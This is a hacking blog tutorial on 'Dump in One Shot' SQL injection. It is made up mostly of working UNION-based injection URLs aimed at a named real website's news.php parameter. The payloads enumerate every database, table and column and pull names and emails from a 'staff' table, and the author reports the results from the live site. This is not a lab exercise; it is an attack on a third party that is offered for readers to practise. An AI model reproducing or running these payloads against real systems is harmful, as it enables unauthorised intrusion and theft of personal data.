Learn To hack
Hacking
BasicAbout Sqli Dios BY Mr.DUNGEON
Hi Guyzz
Today i am making a tutorial on basic of Dump in One Shot [DIOS]
I already know tutorial by Ajkaro and by Zen javanicus , Code ninja is best on this DIOS
And i too learned from their tutorials.But still some of my friends don't understand DIOS and want to learn this and some of friends messaged me about this to learn.So now i think to make a tutorial on DIOS. So lets start
======================================================
First see this query :->
(select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.schemata)where (@a)in (@a:=concat(@a,schema_name,'
'))))a)
In above query we will get all DATABASES
Now there (@a) is called variable and we are selecting this variable from information_schema.schemata and then we are concatenating all the schema names in the 'IN' clause
So i practiced above query like this :->
(
[b]
/*1st select is selecting variable*/
select (@a) from
(
/*2nd select storing 0x00 i variable. So if you want to store something then store in this 2nd select.Also we select third select after that but seperated with comma(,) */
select (@a:=0x00),
(
/*Now this third select. In this select we write our main query like to select database query,table query(information_schema.tables),column query(information_schema.columns).
Also we write our condition in this third select see where part here :-> where (@a)
Also we can use 2 or more than 2 condition in this third select :-> where table_name!='information_schema' and (@a) in
Don't forget to use and to use more than one condition
See more condition :-> where table_name!='information_schema' and table_name like 'us%' and (@a) in
Like this we can use many condition
With that condition like we get only that table_name which start with us
So i want to say you that you guys should play with sql queries so that you learn more and can use your desired condition which get great result.
*/
select (@a) from (information_schema.schemata) where (@a) in
(
/*Now in third select after 'IN' Clause we use our concat part.Note that this is use so that we see our desire result on page.
Like Table Name :-> Admin we see like this on page*/
@a:=concat
(
/*Here we use @a variable mean till now what we do is using variable come here so that we our desire result using that variable.So always include this variable in concat part*/
@a,schema_name,'
'
)
)
)
)
a)
So i wrote all which is essential to note while doing DIOS.
That way i learned DIOS
In short :->
1st select use to select variable
2nd select use to store value in variable.We can store multiple value in different different variable but with comma seperated.Like :->
(@a:=0x00),(@tbl:=0x00),(@count:=0x00)
Seel all those variable storing value and seperated with comma
3rd select use to write our main query , conditions, concating
Now see this in live action :->
DATABASES :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,
(
select (@a) from
(
select (@a:=0x00),
(
select (@a) from (information_schema.schemata) where (@a) in
(
@a:=concat
(
@a,schema_name,'
'
)
)
)
)
a)
,5,6,7,8,9,10--+
We write this while practicing and then we see we write correct then to check we write our above query like this :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in(@a:=concat(@a,schema_name,'
'))))a),5,6,7,8,9,10--+
We see this result :->

To do more better :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.schemata) where (@a) in (@a:=concat(@a,'
',schema_name,'
'))))a),5,6,7,8,9,10--+
Result

Notice the change when we use
before schema_name
Ok now to select Table names with more experiment in concat part :->
First with learning mode ====>
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,
(
select (@a) from
(
select (@a:=0x00),
(
select (@a) from (information_schema.tables) where (@a) in
(
@a:=concat
(
@a,'
Table name :-> ',table_name,'
'
)
)
)
)
a),5,6,7,8,9,10--+
Then in Real mode :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from (select (@a:=0x00),(select (@a) from (information_schema.tables) where (@a) in(@a:=concat(@a,'
Table name :-> ',table_name,'
'))))a),5,6,7,8,9,10--+
Result :->

=====================================================
Now to get table names which not belongs from information schema :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.tables) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
'))))a),5,6,7,8,9,10--+
Now we get only those tables which not belongs to information schema
What i use there :-> where table_schema!='information_schema' and (@a) in
Please note this we write information_scehma in under ' ' you can also use to change this in hex format if necessary
Result :->

Please from now i will not write Experiment mode like :->
(
select (@a) etc etc etc
)
Because i now thinking you guys learned this way for practicing.Whenever you guys confuse then write the query first in this manner mean experiment mode and then you see query correct then check it after little modify this query like i did this before
======================================================
Now to get column names :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Column name :-> ',column_name,'
'))))a),,5,6,7,8,9,10--+
Result :->

Now to get both table names and column names :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema !='information_schema' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
Column name :-> ',column_name,'
'))))a),5,6,7,8,9,10--+
Result :->

See we got both table names and column names in ONE SHOT Big Grin
======================================================//
/************Extracting Column from Tables
Now table name :-> staff
Table name is "staff'
Column name use "name" and "email"
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from staff where (@a) in (@a:=concat(@a,'
Name :-> ',name,'
Email :-> ',email,'
'))))a),5,6,7,8,9,10--+
Result :->

Sorry here in website Email Column Is Blank For this reason Email not printed
=====================================================
Time to do more experiment :->
[b]Get table name start with "st" and column name start with "st" :->
http://www.nhlegendsofhockey.com/news.php?id=-'65' union select 1,2,3,(select (@a) from(select (@a:=0x00),(select (@a) from (information_schema.columns) where table_schema!='information_schema' and table_name like 'st%' and column_name like 'st%' and (@a) in (@a:=concat(@a,'
Table name :-> ',table_name,'
Column name :-> ',column_name,'
'))))a),5,6,7,8,9,10--+
Result :->

I use condition there using LIKE Operator. So now this all upto you how you play with this and experiment with dios and Practice
This is all basic tutorial on DIOS from myside.If you like this then i will write more on advance DIOS
That's all Hope you guys learn something
Thanks for Reading
Comments
Post a Comment